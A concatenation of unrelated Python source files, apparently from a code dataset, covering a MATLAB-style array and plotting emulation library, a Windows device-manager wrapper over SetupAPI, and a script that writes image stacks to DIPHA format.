if len(i) == 1:
i = i[0]
if self.msize[0] == 1: ri = (i.__base0__(self.msize[1]), 0)
elif self.msize[1] == 1: ri = (0, i.__base0__(self.msize[0]))
else:
# access to a flat array
msize = _size(i)
if isinstance(i, mvar): i = i.__base0__(len(self._a.flat))
na = self._a.flat[i]
return _marray(self.dtype, msize, na.reshape(msize[::-1]))
else:
di = len(self.msize)-1
for x in reversed(i):
if isinstance(x, mvar): ri.append(x.__base0__(self.msize[di]))
else: ri.append(x-1)
di -= 1
na = self._a.__getitem__(tuple(ri))
return _marray(self.dtype, nshp, na.reshape(nshp[::-1]))
def __setitem__(self, i, val):
if isinstance(val, _marray): val = val._a
self._a.__setitem__(i[::-1], val)
def __setitem1__(self, i, val):
# determine the size of the new array
if isinstance(val, _marray): val = val._a
ri = []
if len(i) == 1:
# stupid numpy a = rand(1,10); b = rand(1,2); a[0,[3,4]] = b
# doesn't work
i = i[0]
if self.msize[0] == 1:
ri = (i.__base0__(self.msize[1]), 0)
val = val[0]
elif self.msize[1] == 1:
ri = (0, i.__base0__(self.msize[0]))
val = val[0]
else:
# access to a flat array
msize = _size(i)
if isinstance(i, mvar): i = i.__base0__(len(self._a.flat))
self._a.flat[i] = val
return
else:
di = len(self.msize)-1
for x in reversed(i):
if isinstance(x, mvar): ri.append(x.__base0__(self.msize[di]))
else: ri.append(x-1)
di -= 1
self._a.__setitem__(tuple(ri), val)
# properties
def transposed(self):
return transpose(self)
def ctransposed(self):
return ctranspose(self)
T = property(transposed, None, None, "Transpose.")
cT = property(transposed, None, None, "Conjugate transpose.")
# IO
def __str__(self):
return print_marray(self)
def __repr__(self):
return "marray(%r, %r)"%(self.dtype, self.msize)
class mcellarray(mvar, list):
pass
# from the end of
# http://code.activestate.com/recipes/52558/
class _MEnd(object):
'''This object serves as an emulator of the "end" statement of MATLAB.
We want to use the "is" operator therefore we need a singletion.'''
__instance = None # the unique instance
def __new__(cls):
if cls.__instance is None:
cls.__instance = object.__new__(cls)
object.__init__(cls.__instance)
return cls.__instance
def __init__(self):
# prevent the automatic call of object's __init__, it is init-ed once
# in the __new__ function
pass
def __repr__(self):
return 'end'
def __str__(self):
return '(m-end object)'
def __int__(self):
return sys.maxint
end = _MEnd()
def _mslicelen(start, stop, step):
if stop is end or stop is None:
return sys.maxint
return int(np.floor(stop-start)/step + 1)
class _mslice(mvar):
"""m-slice MATLAB style slice object.
You can instantiate this class only by the helper mslice:
>>> mslice[1:10]
"""
def __init__(self, start, stop=None, step=None):
raise NotImplementedError("Direct instantiation is not allowed.")
def init(self, start, stop, step):
if start is None: start = 1
if step is None: step = 1
self.start = start
self.stop = stop
self.step = step
self.dtype = 'double'
self.msize = (1, _mslicelen(self.start, self.stop, self.step))
def init_data(self):
if self._a is None:
self._a = np.array(list(self), dtype='f8').reshape(self.msize[::-1])
def evaluate_end(self, i):
start = self.start
step = self.step
stop = self.stop
if stop is end:
return mslice[start:step:i]
else:
return self
def _ctypes_get(self):
# Create and initialize a real data buffer, then let the default
# function to return the ctypes pointer
if self.stop is end:
raise RuntimeError("Infinite slice can be only used as an index.")
# return None
self.init_data()
return self._a.ctypes
ctypes = property(_ctypes_get, None, None,
"Ctypes-wrapped data object.")
def __iter__(self):
value = self.start
if self.step < 0:
while value >= self.stop:
yield float(value)
value += self.step
else:
while value <= self.stop:
yield float(value)
value += self.step
def __getitem__(self, i):
val = self.start + self.step*i
if val > self.stop:
raise OMPCException('Index exceeds matrix dimensions!')
return float(val)
# self.init_data()
# na = self._a.__getitem__(i)
# return _marray('double', na.shape[::-1], na.reshape(na.shape[::-1]))
def __getitem1__(self, i):
val = self.start + self.step*(i-1)
if val > self.stop:
raise OMPCException('Index exceeds matrix dimensions!')
return float(val)
# self.init_data()
# return _marray('double', self.msize, self._a).__getitem1__(i)
def __len__(self):
if self.stop is end:
# FIXME: how should this be done
# raise AssertionError("This is impossible for a code translated "
# "from a functional MATLAB code.")
# Python allows returning of positive integers only!
return sys.maxint
return _mslicelen(self.start, self.stop, self.step)
def __repr__(self):
return 'mslice[%r:%r:%r]'%\
(self.start, self.step, self.stop)
def __str__(self):
if self.stop is None:
it = iter(self)
return ', '.join( str(it.next()) for i in xrange(3) ) + ' ...'
elif len(self) > 10:
it = iter(self)
retval = self.__repr__() + '\n'
retval += ', '.join( str(it.next()) for i in xrange(3) ) + ' ... '
lastval = self.start + (len(self)-1)*self.step
return retval + str(lastval)
return ', '.join( map(str, self) )
def hasnoend(self):
'Returns true if "self.stop is end".'
return self.stop is end
def __copy__(self):
self.init_data()
return _marray(self.dtype, self.msize, self._a.copy())
def __deepcopy__(self):
self.init_data()
return _marray(self.dtype, self.msize, self._a.copy())
def __base0__(self,shp=None):
if self.hasnoend():
assert shp is not None
return slice(self.start-1, shp, self.step)
return slice(self.start-1, self.stop, self.step)
class _mslice_helper:
def __getitem__(self, i):
s = _mslice.__new__(_mslice)
# FIXME: there is no way of differentiating between mslice[:]
# and mslice[0:], the second will never appear in a code written for
# MATLAB.
# !!! actually, maybe possible by look-back in the stack ?!!
start, stop, step = i.start, end, 1
if i.step is None:
# there are only 2 arguments, stop is i.stop
if i.start == 0 and i.stop == sys.maxint:
# a special case
start = 1
elif i.stop == sys.maxint:
# this is what happens when syntax [start:] is used
raise IndexError(
'Use 2- and 3-slices only. Use "end" instead of "None".')
else: stop = i.stop
else:
# there are all 3 arguments, stop is actually i.step
# 1:2:10 -> slice(1,2,10) -> mslice(1,10,2)
stop = i.step
step = i.stop
s.init(start, stop, step)
return s
class _mslice_helper:
def __getitem__(self, i):
s = _mslice.__new__(_mslice)
# FIXME: there is no way of differentiating between mslice[:]
# and mslice[0:], the second will never appear in a code written for
# MATLAB.
# !!! actually, maybe possible by look-back in the stack ?!!
start, stop, step = i.start, end, 1
if i.step is None:
# there are only 2 arguments, stop is i.stop
if i.start == 0 and i.stop == sys.maxint:
# a special case
start = 1
elif i.stop == sys.maxint:
# this is what happens when syntax [start:] is used
raise IndexError(
'Use 2- and 3-slices only. Use "end" instead of "None".')
else: stop = i.stop
# there are all 3 arguments, stop is actually i.step
elif i.stop < 0:
stop = i.step
step = i.stop
else:
# 1:2:10 -> slice(1,2,10) -> mslice(1,10,2)
stop = i.step
step = i.stop
s.init(start, stop, step)
if not s.hasnoend():
s.init_data()
return _marray('double', s.msize, s._a.copy())
return s
mslice = _mslice_helper()
class mstring(mvar, str):
def __init__(self, s):
mvar.__init__(self)
self.dtype = 'char'
self.msize = (1, len(s))
self._a = s
def __len__(self):
return len(self._a)
def __str__(self):
return self._a
def __repr__(self):
return 'mstring(%r)'%self._a
def _m_constructor_args(*X):
from operator import isSequenceType
dtype = 'double'
if type(X[-1]) is str:
dtype = X[-1]
X = X[:-1]
if len(X) == 1:# and isSequenceType(X):
X = X[0]
#X = X[0], X[0]
return X, dtype
@_ompc_base
def empty(*X):
# check for class
X, dt = _m_constructor_args(*X)
return _marray.empty(X, dt)
@_ompc_base
def zeros(*X):
# check for class
X, dt = _m_constructor_args(*X)
return _marray.zeros(X, dt)
@_ompc_base
def ones(*X):
# check for class
X, dt = _m_constructor_args(*X)
return _marray.ones(X, dt)
@_ompc_base
def eye(*X):
if len(X) == 0:
return _marray.ones((1,1), 'double')
# check for class
X, dt = _m_constructor_args(*X)
kw = dict(dtype=_dtype2numpy[dt])
if not hasattr(X, '__len__'): X = (X,)
na = np.eye(*X[::-1], **kw)
return _marray(dt, na.shape[::-1], na)
@_ompc_base
def mcat(i):
"""Concatenate a list of matrices into a single matrix using separators
',' and ';'. The ',' means horizontal concatenation and the ';' means
vertical concatenation.
"""
if i is None:
return marray()
# calculate the shape
rows = [[]]
final_rows = 0
final_cols = 0
crows = ccols = 0
pos = []
pos2 = []
for x in i:
#if x == ';':
if x is Ellipsis:
rows.append([])
if final_cols > 0 and final_cols != ccols:
error("Incompatible shapes!")
else:
final_cols = ccols
final_rows += crows
ccols = 0
pos.append(Ellipsis)
elif isinstance(x, mvar):
shp = x.msize
if len(shp) < 1: shp = [0]
if len(shp) < 2: shp += [0]
rows[-1].append(shp[0])
pos.append( (slice(final_rows, final_rows+shp[0]),
slice(ccols, ccols+shp[1])) )
crows = shp[0] # FIXME
ccols += shp[1]
elif _isscalar(x):
rows[-1].append(1)
pos.append( (final_rows, ccols) )
crows = 1
ccols += 1
else:
raise OMPCException("Unsupported type: %s!"%type(x))
if final_cols > 0 and final_cols != ccols:
error("Incompatible shapes!")
else:
final_cols = ccols
final_rows += crows
out = empty((final_rows, final_cols), 'double')
for sl, x in _izip(pos, i):
if x is not Ellipsis:
if isinstance(x, mvar): x = x._a
out._a.__setitem__(sl[::-1], x)
#out._a.reshape(final_cols, final_rows).T.__setitem__(sl, x)
return out
def who(*args,**kwargs):
nargin, nargout = _get_narginout(0)
import __main__
ns = __main__.__dict__
vars = [ x for x in ns \
if isinstance(ns[x], mvar) and x[0] != '_' ]
if args:
vars = [ x for x in vars if x in args ]
vars.sort()
if nargout == 0:
print 'Your variables are:'
print ' '.join(vars)
else:
return mcellarray(vars)
@_ompc_base
def whos(*args, **kwargs):
"""Return list of variables in the current workspace."""
nargin, nargout = _get_narginout(0)
import __main__
ns = __main__.__dict__
vars = [ x for x in ns \
if isinstance(ns[x], mvar) and x[0] != '_' ]
if args:
vars = [ x for x in vars if x in args ]
vars.sort()
if nargout == 0:
cols = ['Name', 'Size', 'Bytes', 'Class', 'Attributes']
print ' %10s %15s %15s %10s %10s '%tuple(cols)
for xname in vars:
x = ns[xname]
print ' %10s %15r %15r %10s '%(xname, x.msize, x._a.nbytes, x.dtype)
print
else:
raise NotImplementedError()
@_ompc_base
def size(X):
return X.msize
@_ompc_base
def rand(*args):
if isinstance(args[0], str):
raise NotImplemented
if len(args) == 1:
args = (args[0], args[0])
return _marray('double', args, np.random.rand(*args[::-1]))
@_ompc_base
def randn(*args):
if isinstance(args[0], str):
raise NotImplemented
if len(args) == 1:
args = (args[0], args[0])
return _marray('double', args, np.random.randn(*args[::-1]))
@_ompc_base
def reshape(A, *newsize):
if len(newsize) == 0:
raise OMPCException('??? Error using ==> reshape\n'
'Not enough input arguments.')
if len(newsize) == 1 and hasattr(newsize, '__len__'):
newsize = newsize[0]
if not np.prod(A.msize) == np.prod(newsize):
raise OMPCException('??? Error using ==> reshape\n'
'To RESHAPE the number of elements must not change.')
out = A.__copy__()
out.msize = newsize
out._a = out._a.reshape(newsize[::-1])
return out
@_ompc_base
def fliplr(X):
if X._a.ndim != 2:
error('X must be a 2-D matrix.')
return _marray(X.dtype, X.msize, np.flipud(X._a))
@_ompc_base
def flipud(X):
if X._a.ndim != 2:
error('X must be a 2-D matrix.')
return _marray(X.dtype, X.msize, np.fliplr(X._a))
@_ompc_base
def sum(A, *dimtype):
restype = 'double'
dim = 1
if len(dimtype) == 2:
dim = dimtype[0]
dimtype = dimtype[1]
elif len(dimtype) == 1:
dimtype = dimtype[0]
if isinstance(dimtype, str):
if dimtype == 'native':
restype = A.dtype
else:
restype = dimtype
else:
dim = dimtype
msize = A.msize
if A.msize[dim-1] == 1:
return A.__copy__()
nshp = list(msize)
nshp[dim-1] = 1
if len(nshp) > 2 and nshp[-1] == 1: nshp = nshp[:-1]
# use numpy's sum
a = np.sum(A._a, len(msize)-dim)
return _marray(A.dtype, nshp, a.reshape(nshp[::-1]))
@_ompc_base
def find(cond):
a = mpl.find(cond._a.reshape(-1)) + 1
msize = (len(a), 1)
if len(cond.msize) == 2 and cond.msize[0] == 1:
msize = (1, len(a))
return _marray('double', msize, a.astype('f8').reshape(msize[::-1]))
try: _inv = np.oldnumeric.linear_algebra.inverse
except: _inv = np.linalg.inv
@_ompc_base
def inv(X):
assert len(X.msize) == 2 and X.msize[0] == X.msize[1]
return _marray('double', X.msize, _inv(X._a.T).T)
_eig = np.linalg.eig
@_ompc_base
def eig(X):
assert len(X.msize) == 2 and X.msize[0] == X.msize[1]
nargin, nargout = _get_narginout(1)
[V, D] = _eig(X._a.T)
if nargout == 1:
return _marray('double', (len(V), 1), V.reshape(1, -1))
elif nargout == 2:
V = np.diag(V.reshape(-1))
return _marray('double', D.shape[::-1], D.T), \
_marray('double', V.shape, V)
else:
raise OMPCException('Too many output arguments.')
_svd = np.linalg.svd
@_ompc_base
def svd(X, *args):
if len(args) > 0:
raise NotImplementedError()
assert len(X.msize) == 2 and X.msize[0] == X.msize[1]
nargin, nargout = _get_narginout(1)
[U, S, V] = _svd(X._a.T)
# V is transposed already
if nargout == 1:
return _marray('double', (len(S), 1), S.reshape(1, -1))
elif nargout == 3:
S = np.diag(S.reshape(-1))
return _marray('double', U.shape[::-1], U.T), \
_marray('double', S.shape[::-1], S), \
_marray('double', V.shape, V)
else:
raise OMPCException('Incorrect number of output arguments.')
@_ompc_base
def poly(X):
na = np.poly(X._a.T)
return _marray('double', (1, len(na)), na.reshape(-1, 1))
@_ompc_base
def roots(X):
assert len(X.msize) == 2 and (X.msize[0] == 1 or X.msize[1] == 1)
na = np.roots(X._a.reshape(-1))
return _marray('double', (len(na), 1), na.reshape(1, -1))
@_ompc_base
def conv(X, Y):
assert len(X.msize) == 2 and (X.msize[0] == 1 or X.msize[1] == 1)
assert len(Y.msize) == 2 and (Y.msize[0] == 1 or Y.msize[1] == 1)
na = np.convolve(X._a.reshape(-1), Y._a.reshape(-1))
msize = (1, len(na))
if Y.msize[1] == 1:
msize = (len(na), 1)
return _marray('double', msize, na.reshape(msize[::-1]))
@_ompc_base
def round(X):
return _marray('double', X.msize, np.around(X._a))
@_ompc_base
def floor(X):
return _marray('double', X.msize, np.floor(X._a))
@_ompc_base
def ceil(X):
return _marray('double', X.msize, np.ceil(X._a))
@_ompc_base
def fix(X):
return _marray('double', X.msize, np.fix(X._a))
def _what(X):
if isinstance(X, mvar):
return X.dtype, X.msize
elif isinstance(X, int):
return 'int32', (1, 1)
elif isinstance(X, float):
return 'double', (1, 1)
else:
raise NotImplementedError()
@_ompc_base
def mod(X, i):
dtype, msize = _what(X)
if isinstance(X, mvar): X = X._a
if isinstance(i, mvar):
if i.msize != msize:
raise OMPCException("Matrix dimensions must agree!")
i = i._a
if i == 0:
return _marray(dtype, msize, X)
elif np.all(X == i):
return zeros(msize, dtype)
na = np.mod(X, i)
return _marray(_numpy2dtype[na.dtype], msize, na)
@_ompc_base
def sqrt(X):
if _isscalar(X):
X = _marray('double', (1,1), [X])
if np.any(X._a < 0):
return _marray('complex', X.msize, np.sqrt(X._a.astype('complex128')))
else:
return _marray('double', X.msize, np.sqrt(X._a))
@_ompc_base
def magic(n):
# from Octave's magic.m
A = empty((n, n), 'double')
if n == 0:
return marray([])
elif mod (n, 2) == 1:
n = 3
shift = floor ((mslice[0:n*n-1])/n)
c = mod(mslice[1:n*n] - shift + (n-3)/2, n)
r = mod(mslice[n*n:-1:1] + 2*shift, n)
A(c*n+r+1).lvalue = mslice[1:n*n]
A = reshape(A, n, n);
elif mod(n, 4) == 0:
A = reshape(mslice[1:n*n], n, n).cT;
I = mcat([mslice[1:4:n], mslice[4:4:n]])
J = fliplr(I);
A(I,I).lvalue = A(J,J)
I = mcat([mslice[2:4:n], mslice[3:4:n]]);
J = fliplr(I);
A(I,I).lvalue = A(J,J);
elif mod(n, 4) == 2:
m = n/2
A = magic(m)
A = mcat([A, A+2*m*m, OMPCSEMI, A+3*m*m, A+m*m])
k = (m-1)/2
if k > 1:
I = mslice[1:m]
J = mcat([mslice[2:k], mslice[n-k+2:n]])
A([I,I+m],J).lvalue = A([I+m,I],J)
I = mcat([mslice[1:k], mslic[k+2:m]])
A([I,I+m],1).lvalue = A([I+m,I],1);
I = k + 1
A([I,I+m],I).lvalue = A([I+m,I],I)
return A
from os.path import normpath as _normpath
import scipy.io
@_ompc_base
def load(*X):
X = list(X)
format = None
re = []
vars = []
if X[0].strip()[0] == '-':
op = X.pop(0).strip()
if op.lower() == '-ascii': format = 'a'
elif op.lower() == '-mat': format = 'm'
else: raise OMPCException('Unknown option "%s".'%op)
# next must be filename
fname = X.pop(0)
base, ext = os.path.splitext(fname)
if not ext:
if os.path.exists(fname):
format = 'a'
else:
ext = '.mat'
fname += ext
format = 'm'
elif ext == '.mat':
format = 'm'
if not os.path.exists(fname):
raise OMPCException('Cannot find file "%s"!'%fname)
# variables
if len(X) > 0:
if X[0].strip()[0] == '-':
# regexp
op = X.pop(0).strip().lower()
if not op == '-regexp':
raise OMPCException('Unknown option "%s".'%op)
re = X
else:
vars = X
fname = _normpath(fname)
# load
if format == 'm':
# scipy makes imports really slow
_loadmat = scipy.io.loadmat
try: d = _loadmat(fname, matlab_compatible=True)
except: raise OMPCException('Cannot open "%s" as an M-file!!'%fname)
data = []
if vars:
data = [ (k, v) for k, v in d.items() if k in vars ]
elif re:
raise NotImplementedError()
else:
data = [ (k, v) for k, v in d.items() if k[:2] != '__' ]
# populate the workspace
import inspect
cf = inspect.currentframe()
for var, val in data:
na = np.asfortranarray(val).T
cf.f_back.f_globals[var] = \
_marray(_numpy2dtype[str(na.dtype)], na.shape[::-1], na)
else:
# ASCII
try: f = file(fname, 'rU')
except: raise OMPCException('Cannot open "%s"!'%fname)
data = []
for x in f:
x = x.strip()
if x.startswith('%'): continue
data += [ map(float, x.split()) ]
na = np.asfortranarray(data, 'f8').T
import inspect
cf = inspect.currentframe()
base = os.path.basename(base)
cf.f_back.f_globals[base] = _marray('double', na.shape[::-1], na)
# _ompc_base
# def save(*X):
# import inspect
# f = inspect.currentframe()
# d = {}
# for var in args:
# d[var] = f.f_back.f_globals[var]
# _savemat(fname, d)
@_ompc_base
def length(X):
return len(X)
_fft = np.fft.fft
@_ompc_base
def fft(X,N=mcat([]),axis=None):
if axis is not None: axis = len(X.msize) - i - 1
if len(X.msize) == 2:
if X.msize[0] == 1:
X = X._a.reshape(-1)
else:
if axis is None: axis = len(X.msize)-1
X = X._a
elif len(X.msize) > 2:
if axis is None:
# first non-singleton dimension
for i in xrange(len(X.msize),-1,-1):
if X.msize[i] > 1: break
axis = i
else:
raise NotImplementedError("Less than 2D?")
# N
if isempty(N): N = X.shape[axis]
# do it
na = _fft(X, N, axis)
msize = na.shape[::-1]
if len(msize) < 2: msize = (msize, 1)
return _marray(_numpy2dtype[na.dtype], msize, na)
class mhandle(_marray):
def __init__(self, arg):
_marray.__init__(self, 'double', (1,1), [float(id(arg))])
self._arg = arg
def _plot_args(*args):
from sets import Set
args = list(args)
arrs = [[]]
d = {}
colorspec = False
i = 0
while len(args) > 0:
arg = args.pop(0)
if isinstance(arg, _marray):
sz = arg.msize
if len(sz) == 2 and sz[0] == 1:
arrs[-1] += [ arg._a ]
else:
arrs[-1] += [ arg._a.T ]
elif _isscalar(arg):
arrs[-1] += [ _marray('double', (1,1), arg) ]
elif isinstance(arg, str):
if not colorspec:
if len(arg) <= 3 and \
len(Set(arg).intersection(
'bgrcmykw'+'*-.:,o^v<>s+xDd1234hHp|_')) > 0:
if arg == '*': arg = '+'
arrs[-1] += [ arg ]
colorspec = True
elif isinstance(arg, str):
if len(args) < 1:
raise OMPCException(
'Missing value for parameter "%s".'%arg)
val = args.pop(0)
d[arg] = val
elif isinstance(arg, str):
if len(args) < 1:
raise OMPCException(
'Missing value for parameter "%s".'%arg)
val = args.pop(0)
d[arg] = val
else:
args.insert(0, arg)
colorspec = False
arrs.extend([d, []])
break
if not isinstance(arrs[-1], dict): arrs.append(d)
arrs = [ (a, d) for a, d in _izip(arrs[::2], arrs[1::2]) ]
#print 'll', arrs
return arrs
@_ompc_base
def set(x,*args):
if not isinstance(x, mhandle):
raise OMPCException("First argument must be an object handle!")
o = x._arg
args, kwargs = _plot_args_matlab(args, kwargs)
assert len(args) == 0
for k, v in kwargs.items():
try: getattr(o,'set_%s'%k)(v)
except: "Property '%s' not supported."%k
@_ompc_base
def xlabel(*args):
# d = _plot_args(args[1:])
return mhandle(mpl.xlabel(args[0]))
@_ompc_base
def ylabel(*args):
# d = _plot_args(args[1:])
return mhandle(mpl.ylabel(args[0]))
@_ompc_base
def zlabel(*args):
# d = _plot_args(args[1:])
return mhandle(mpl.zlabel(args[0]))
@_ompc_base
def plot(*args):
d = _plot_args(*args)
for x, kwargs in d:
mpl.plot(*x, **kwargs)
ha = mhandle(mpl.gca())
mpl.draw()
mpl.hold(False)
mpl.show()
return ha
@_ompc_base
def bar(*args):
ha = mpl.gca()
opts = None
width = 0.8
if isinstance(args[0], mhandle):
ha = args[0]
args = args[1:]
if isinstance(args[-1], str):
opts = args[-1]
args = args[:-1]
X, Y = None, None
if len(args) == 1:
Y = args[0]._a
X = mslice[1:len(Y)]._a
elif len(args) >= 2:
X = args[0]._a
Y = args[1]._a
if len(args) == 3:
width = args[2]._a
X = X.reshape(-1)
if len(Y.shape) == 2 and Y.shape[0] == 1: Y = Y.T
res = mpl.bar(X, Y, width)
ha = mhandle(res)
mpl.hold(False)
mpl.show()
return ha
@_ompc_base
def axis(*args):
nargin, nargout = _get_narginout(0)
if nargout > 0:
raise OMPCException('Too many output arguments.')
ha = mpl.gca()
if len(args) == 2:
ha = args[0]._arg
args = args[1:]
if len(args) > 1:
raise OMPCException('Too many input arguments.')
x = args[0]
if isinstance(x, str):
try:
mpl.axis(x)
except:
raise NotImplementedError()
assert isinstance(x, _marray)
mpl.axis(x._a.reshape(-1))
@_ompc_base
def grid(*args):
b = None #trigger
ha = mpl.gca()
kwargs = {}
if len(args) == 1:
# isinstance(args[0], mstring) not necessary if mstring inherits str
x = args[0].lower()
if isinstance(x, str):
if x == 'on': b = True
elif x == 'off': b = False
elif x == 'minor':
# FIXME: issue a warning only
raise NotImplementedError("Minor axis not ready yet!")
else:
raise OMPCException('Unknown option "%s"!'%x)
elif isinstance(x, mhandle):
ha = x
else:
raise OMPCException(
'First argument must be an axes handle or a string.')
elif len(args) > 1:
if not isinstance(args[0], mhandle):
raise OMPCException('First argument must be an axes handle.')
if len(args)%2 > 0:
raise OMPCException('Name, value pairs expected after a handle.')
kwargs = dict([(k, v) for k, v in _izip(args[1::2], args[2::2])])
# FIXME: issue a warning only
raise NotImplementedError("Setting parmeters not ready yet!")
if not hasattr(ha, 'grid'):
ha = ha.get_axes()
ha.grid(b)
mpl.draw()
@_ompc_base
def title(*args):
mpl.title(args)
@_ompc_base
def legend(*args):
mpl.legend(args)
|
StarcoderdataPython
|
215036
|
<reponame>MakaronKanon/infi.devicemanager
__import__("pkg_resources").declare_namespace(__name__)
from contextlib import contextmanager
from infi.exceptools import chain
from .setupapi import functions, properties, constants
from infi.pyutils.lazy import cached_method
from logging import getLogger
ROOT_INSTANCE_ID = u"HTREE\\ROOT\\0"
GLOBALROOT = u"\\\\?\\GLOBALROOT"
logger = getLogger(__name__)
class Device(object):
def __init__(self, instance_id):
super(Device, self).__init__()
self._instance_id = instance_id
def __repr__(self):
# we cant use hasattr and getattr here, because friendly_name is a property method that may raise exception
return u"<{}>".format(self.friendly_name if self.has_property("friendly_name") else self.description)
@contextmanager
def _open_handle(self):
dis, devinfo = None, None
try:
dis = functions.SetupDiCreateDeviceInfoList()
devinfo = functions.SetupDiOpenDeviceInfo(dis, self._instance_id)
yield (dis, devinfo)
finally:
if dis is not None:
functions.SetupDiDestroyDeviceInfoList(dis)
def _get_setupapi_property(self, key):
from .setupapi import WindowsException
with self._open_handle() as handle:
dis, devinfo = handle
try:
return functions.SetupDiGetDeviceProperty(dis, devinfo, key).python_object
except WindowsException as exception:
if exception.winerror == constants.ERROR_NOT_FOUND:
raise KeyError(key)
chain(exception)
@property
@cached_method
def class_guid(self):
guid = self._get_setupapi_property(properties.DEVPKEY_Device_ClassGuid)
return functions.guid_to_pretty_string(guid)
@property
@cached_method
def description(self):
try:
return self._get_setupapi_property(properties.DEVPKEY_Device_DeviceDesc)
except KeyError:
return 'description unavailable'
@property
@cached_method
def hardware_ids(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_HardwareIds)
@property
@cached_method
def instance_id(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_InstanceId)
@property
@cached_method
def psuedo_device_object(self):
value = self._get_setupapi_property(properties.DEVPKEY_Device_PDOName)
if value is None:
raise KeyError(properties.DEVPKEY_Device_PDOName)
return GLOBALROOT + value
@property
@cached_method
def friendly_name(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_FriendlyName)
@property
@cached_method
def location_paths(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_LocationPaths)
@property
@cached_method
def location(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_LocationInfo)
@property
@cached_method
def bus_number(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_BusNumber)
@property
@cached_method
def ui_number(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_UINumber)
@property
@cached_method
def address(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_Address)
@property
def children(self):
children = []
items = []
try:
items = self._get_setupapi_property(properties.DEVPKEY_Device_Children)
except KeyError:
pass
if items:
for instance_id in items:
children.append(Device(instance_id))
return children
@property
def parent(self):
instance_id = self._get_setupapi_property(properties.DEVPKEY_Device_Parent)
return Device(instance_id)
@property
@cached_method
def instance_id(self):
return self._instance_id
@property
@cached_method
def devnode_status(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_DevNodeStatus)
def is_root(self):
return self._instance_id == ROOT_INSTANCE_ID
def is_real_device(self):
return self.has_property("location")
def is_iscsi_device(self):
try:
hardware_ids = self.hardware_ids
except KeyError:
return False
return any("iscsi" in hardware_id.lower() for hardware_id in hardware_ids)
def is_hidden(self):
return bool(self.devnode_status & constants.DN_NO_SHOW_IN_DM)
def has_property(self, name):
try:
_ = getattr(self, name)
return True
except KeyError:
pass
return False
@cached_method
def get_available_property_ids(self):
result = []
with self._open_handle() as handle:
dis, devinfo = handle
guid_list = functions.SetupDiGetDevicePropertyKeys(dis, devinfo)
for guid in guid_list:
result.append(functions.guid_to_pretty_string(guid))
return result
def rescan(self):
from .cfgmgr32 import open_handle, CM_Reenumerate_DevNode_Ex
if not self.is_real_device() and not self.is_iscsi_device():
return
with open_handle(self._instance_id) as handle:
machine_handle, device_handle = handle
_ = CM_Reenumerate_DevNode_Ex(device_handle, 0, machine_handle)
class DeviceManager(object):
def __init__(self):
super(DeviceManager, self).__init__()
self._dis_list = []
def __repr__(self):
return "<DeviceManager>"
@contextmanager
def _open_handle(self, guid_string):
dis = None
try:
dis = functions.SetupDiGetClassDevs(guid_string)
yield dis
finally:
if dis is not None:
functions.SetupDiDestroyDeviceInfoList(dis)
def get_devices_from_handle(self, handle):
devices = []
for devinfo in functions.SetupDiEnumDeviceInfo(handle):
try:
instance_id = functions.SetupDiGetDeviceProperty(handle, devinfo, properties.DEVPKEY_Device_InstanceId)
except:
logger.exception("failed to get DEVPKEY_Device_InstanceId from device {!r} by handle {!r}".format(handle, devinfo))
continue
devices.append(Device(instance_id.python_object))
return devices
@property
def all_devices(self):
with self._open_handle(None) as handle:
return self.get_devices_from_handle(handle)
@property
def disk_drives(self):
disk_drives = []
for controller in self.storage_controllers:
def match_class_guid(device):
try:
return device.class_guid == constants.GENDISK_GUID_STRING
except:
return False
disk_drives.extend(filter(match_class_guid, controller.children))
return disk_drives
@property
def storage_controllers(self):
with self._open_handle(constants.SCSIADAPTER_GUID_STRING) as handle:
return self.get_devices_from_handle(handle)
@property
def scsi_devices(self):
devices = []
with self._open_handle(constants.SCSIADAPTER_GUID_STRING) as handle:
storage_controllers = self.get_devices_from_handle(handle)
for controller in storage_controllers:
if not controller.has_property("children"):
continue
devices.extend(controller.children)
return devices
@property
def volumes(self):
with self._open_handle(constants.GENVOLUME_GUID_STRING) as handle:
return self.get_devices_from_handle(handle)
@property
def root(self):
return Device(ROOT_INSTANCE_ID)
|
StarcoderdataPython
|
8137
|
import sys
from matplotlib import image as mpimg
import numpy as np
import os
DIPHA_CONST = 8067171840
DIPHA_IMAGE_TYPE_CONST = 1
DIM = 3
input_dir = os.path.join(os.getcwd(), sys.argv[1])
dipha_output_filename = sys.argv[2]
vert_filename = sys.argv[3]
input_filenames = [name
for name in os.listdir(input_dir)
if (os.path.isfile(input_dir + '/' + name)) and (name != ".DS_Store")]
input_filenames.sort()
image = mpimg.imread(os.path.join(input_dir, input_filenames[0]))
nx, ny = image.shape
del image
nz = len(input_filenames)
print(nx, ny, nz)
#sys.exit()
im_cube = np.zeros([nx, ny, nz])
i = 0
for name in input_filenames:
sys.stdout.flush()
print(i, name)
fileName = input_dir + "/" + name
im_cube[:, :, i] = mpimg.imread(fileName)
i = i + 1
print('writing dipha output...')
with open(dipha_output_filename, 'wb') as output_file:
# this is needed to verify you are giving dipha a dipha file
np.int64(DIPHA_CONST).tofile(output_file)
# this tells dipha that we are giving an image as input
np.int64(DIPHA_IMAGE_TYPE_CONST).tofile(output_file)
# number of points
np.int64(nx * ny * nz).tofile(output_file)
# dimension
np.int64(DIM).tofile(output_file)
# pixels in each dimension
np.int64(nx).tofile(output_file)
np.int64(ny).tofile(output_file)
np.int64(nz).tofile(output_file)
# pixel values
for k in range(nz):
sys.stdout.flush()
print('dipha - working on image', k)
for j in range(ny):
for i in range(nx):
val = int(-im_cube[i, j, k]*255)
'''
if val != 0 and val != -1:
print('val check:', val)
'''
np.float64(val).tofile(output_file)
output_file.close()
print('writing vert file')
with open(vert_filename, 'w') as vert_file:
for k in range(nz):
sys.stdout.flush()
print('verts - working on image', k)
for j in range(ny):
for i in range(nx):
vert_file.write(str(i) + ' ' + str(j) + ' ' + str(k) + ' ' + str(int(-im_cube[i, j, k] * 255)) + '\n')
vert_file.close()
print(nx, ny, nz)
|
StarcoderdataPython
|
4812025
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
pip_services3_commons.refer.References
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Referencescomponent implementation
